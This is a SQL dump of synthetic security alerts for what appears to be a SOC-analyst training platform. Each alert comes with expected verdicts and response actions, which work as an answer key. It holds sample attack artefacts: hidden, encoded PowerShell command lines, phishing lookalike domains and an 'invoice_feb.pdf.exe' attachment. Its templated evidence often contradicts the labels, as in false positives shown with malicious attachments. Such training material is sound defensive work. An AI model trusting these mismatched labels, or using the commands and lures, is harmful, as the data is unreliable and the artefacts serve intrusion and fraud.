(729, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A malicious executable was detected running on an endpoint, identified by its known malware hash.', 'Malware', 'T1059', 1, 'Closed', 141, '{\"timestamp\":\"2026-01-11T14:05:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"\",\"username\":\"jane.doe\",\"hostname\":\"workstation01.examplecorp.com\",\"request_body\":\"\",\"command_line\":\"C:\\\\malicious_folder\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 06:28:28', '2026-02-12 04:13:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 63 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious_folder\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable identified as malware with C2 communication\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is widely recognized as malicious, and the process execution is anomalous for the user.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(730, 'Suspicious Email Flagged as False Positive', 'medium', 'Email Gateway', 'An email was flagged as suspicious due to a lookalike domain, but the sender is verified as legitimate.', 'Phishing', 'T1566', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T16:48:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"10.0.0.5\",\"username\":\"john.smith@examplecorp.com\",\"hostname\":\"mailserver.examplecorp.com\",\"email_sender\":\"billing@examp1ecorp.com\",\"url\":\"http://examp1ecorp.com/invoice\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-10 08:48:40', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"billing@examp1ecorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Verified sender; domain used by billing department\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://examp1ecorp.com/invoice\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain resembles legitimate company domain but is legitimate\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal email server IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender and domain have been verified as legitimate, marking this as a false positive.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Flagged as False Positive\",\"date\":\"2026-02-01T20:32:22.376Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(731, 'Spear Phishing Attempt with Malicious URL Detected', 'high', 'Proofpoint', 'A spear phishing email was detected attempting to lure a user to a malicious website. The email impersonated the CEO and contained a link to a lookalike domain.', 'Phishing', 'T1566', 1, 'Closed', 142, '{\"timestamp\":\"2026-01-11T09:15:32Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"j.doe@company.com\",\"hostname\":\"workstation-01\",\"email_sender\":\"ceo@company-secure.com\",\"domain\":\"company-secure.com\",\"url\":\"http://secure-company.com/login\"}', '2026-01-11 08:10:28', '2026-03-07 05:12:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@company-secure.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in phishing campaigns targeting corporate users.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-company.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing attacks impersonating company executives.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious domain impersonating the CEO, and the URL is flagged as malicious.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Attempt with Malicious URL 
Detected\",\"date\":\"2026-02-01T20:32:22.377Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(732, 'Credential Harvesting via Office365 Phishing Page', 'critical', 'Email Gateway', 'An email was detected redirecting the user to an Office365 lookalike login page to steal credentials. The domain used was not authorized by the organization.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:42:18Z\",\"event_type\":\"email_received\",\"src_ip\":\"202.54.1.1\",\"dst_ip\":\"10.0.0.12\",\"username\":\"a.smith@company.com\",\"hostname\":\"workstation-02\",\"email_sender\":\"office365@security-alert.com\",\"domain\":\"security-alert.com\",\"url\":\"http://office-login.com/verify\"}', '2026-01-10 11:41:11', '2026-02-15 08:27:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"office365@security-alert.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email address involved in phishing attempts targeting Office365 users.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://office-login.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"URL identified as phishing site mimicking Office365 login page.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a URL that leads to a phishing page designed to steal Office365 credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Credential Harvesting via Office365 Phishing 
Page\",\"date\":\"2026-02-01T20:32:22.378Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(733, 'Business Email Compromise Attempt via Lookalike Domain', 'medium', 'Proofpoint', 'An email pretending to be from a trusted partner was detected with a request for an urgent transaction. The sender\'s domain closely resembles an official domain but is slightly altered.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-11T13:05:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"10.0.0.8\",\"username\":\"c.brown@company.com\",\"hostname\":\"workstation-03\",\"email_sender\":\"partner@trusted-secure.com\",\"domain\":\"trusted-secure.com\",\"url\":\"http://secure-trusted.com/transaction\"}', '2026-01-09 17:01:50', '2026-03-06 10:30:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"partner@trusted-secure.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain closely resembling a trusted partner, associated with BEC attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-trusted.com/transaction\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL used in BEC scams to redirect users to fraudulent transaction pages.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender\'s domain is a lookalike of a trusted partner, used in a BEC attempt to request a fraudulent transaction.\"}', 'Beginner', 'NDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Business 
Email Compromise Attempt via Lookalike Domain\",\"date\":\"2026-02-01T20:32:22.379Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(734, 'False Positive Alert: Legitimate Email Flagged as Phishing', 'low', 'Email Gateway', 'An email from a new vendor was mistakenly flagged as phishing due to an unusual domain. The email content and sender\'s reputation are verified as legitimate.', 'Phishing', 'T1566', 0, 'Closed', 185, '{\"timestamp\":\"2026-01-11T14:30:22Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.5\",\"dst_ip\":\"10.0.0.15\",\"username\":\"m.jones@company.com\",\"hostname\":\"workstation-04\",\"email_sender\":\"info@newvendor.com\",\"domain\":\"newvendor.com\",\"url\":\"http://newvendor.com/welcome\"}', '2026-01-11 06:47:17', '2026-02-20 09:02:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"info@newvendor.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"Email address verified as legitimate by OSINT checks.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://newvendor.com/welcome\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"URL verified as legitimate, associated with a new vendor.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email from a new vendor was mistakenly flagged due to an unfamiliar domain but verified as legitimate.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"False Positive Alert: Legitimate Email Flagged as Phishing\",\"date\":\"2026-02-01T20:32:22.380Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(735, 'Spear Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A spear phishing email was detected targeting an employee, containing a malicious URL hosted on a lookalike domain. The email uses urgency language to lure the victim into clicking the link.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.10.5\",\"username\":\"jdoe@example.com\",\"hostname\":\"WS-001\",\"email_sender\":\"ceo@examp1e.com\",\"url\":\"http://login.examp1e.com/secure\",\"email_subject\":\"Urgent: Verify Your Account Immediately\"}', '2026-01-11 02:32:22', '2026-03-15 10:53:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@examp1e.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://login.examp1e.com/secure\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing login pages\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 152 times for phishing activities\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The lookalike domain and use of urgency suggest a targeted phishing attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected with Malicious URL\",\"date\":\"2026-02-01T20:32:22.381Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(736, 'Detected Command and Control Communication from Malware', 'critical', 'CrowdStrike', 'A malware infection was detected attempting to communicate with a known C2 server. The connection was initiated from an internal host.', 'Malware', 'T1105', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.89\",\"username\":\"user1@company.com\",\"hostname\":\"PC-003\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnop3456\"}', '2026-01-10 14:58:13', '2026-02-16 18:03:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware C2 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnop3456\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in several malware infections\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of infected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The communication to a known C2 server confirms the host is compromised.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(737, 'Failed Brute Force Login Attempts Detected', 'medium', 'Wazuh', 'Multiple failed login attempts were detected from a foreign IP address, indicating a potential brute force attack.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:30:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe@company.com\",\"hostname\":\"PC-004\",\"failed_attempts\":35}', '2026-01-11 11:45:57', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported several times for suspicious login activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted host\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"No additional suspicious activity detected for this user\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The number of failed attempts and foreign IP location indicate a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.382Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe@company.com\\\",\\\"hostname\\\":\\\"PC-004\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:31:22.382Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe@company.com\\\",\\\"hostname\\\":\\\"PC-004\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:30:22.382Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe@company.com\\\",\\\"hostname\\\":\\\"PC-004\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:29:22.382Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe@company.com\\\",\\\"hostname\\\":\\\"PC-004\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:28:22.382Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe@company.com\\\",\\\"hostname\\\":\\\"PC-004\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(738, 'Suspicious Email Flagged as Possible False Positive', 'low', 'Email Gateway', 'An email was flagged as suspicious due to its sender domain, but analysis shows it matches known safe entities.', 'Phishing', 'T1598', 0, 'Closed', 232, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.25\",\"dst_ip\":\"192.168.1.15\",\"username\":\"user2@company.com\",\"hostname\":\"WS-002\",\"email_sender\":\"newsletter@trustedsource.com\",\"email_subject\":\"Monthly Updates\"}', '2026-01-11 10:40:23', '2026-03-09 18:19:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"newsletter@trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Sender domain verified as legitimate source\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.0.2.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"IP matches known safe email servers\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender and IP are verified as legitimate, indicating this is a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Flagged as Possible False Positive\",\"date\":\"2026-02-01T20:32:22.384Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(739, 'APT-Level Phishing Attack via Spoofed Office365 Login Page', 'critical', 'Proofpoint', 'A spear phishing email was detected attempting to harvest credentials using a spoofed Office365 login page. The email was sent from a lookalike domain and contained urgency language.', 'Phishing', 'T1566', 1, 'investigating', 34, '{\"timestamp\":\"2026-01-11T09:15:34Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"\",\"username\":\"jdoe@company.com\",\"hostname\":\"mail.company.com\",\"email_sender\":\"no-reply@0ffice365-security.com\",\"domain\":\"0ffice365-security.com\",\"url\":\"http://login-verifyoffice365.com\",\"email_subject\":\"Immediate Action Required: Verify Your Office365 Account\"}', '2026-01-11 14:23:02', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 157 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@0ffice365-security.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Lookalike domain used in phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://login-verifyoffice365.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Phishing page mimicking Office365 login\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious IP and used a lookalike domain to deceive users into entering their credentials.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"APT-Level Phishing Attack via Spoofed Office365 Login Page\",\"date\":\"2026-02-01T20:32:22.385Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(740, 'Fileless Malware Detected via Process Hollowing', 'high', 'CrowdStrike', 'A process hollowing technique was detected on a user endpoint, indicating a potential fileless malware execution. The attack leveraged PowerShell with heavy obfuscation.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"\",\"username\":\"m.smith\",\"hostname\":\"DESKTOP-45KTHR\",\"command_line\":\"powershell -NoP -W Hidden -Enc dwBvAGsAZQBuAC0AUABvAHcAZQByAFMAYwBoAGUAbQBlACAAOwAgACQAbABvAGcAKwA=\"}', '2026-01-11 01:56:23', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -NoP -W Hidden -Enc dwBvAGsAZQBuAC0AUABvAHcAZQByAFMAYwBoAGUAbQBlACAAOwAgACQAbABvAGcAKwA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of process 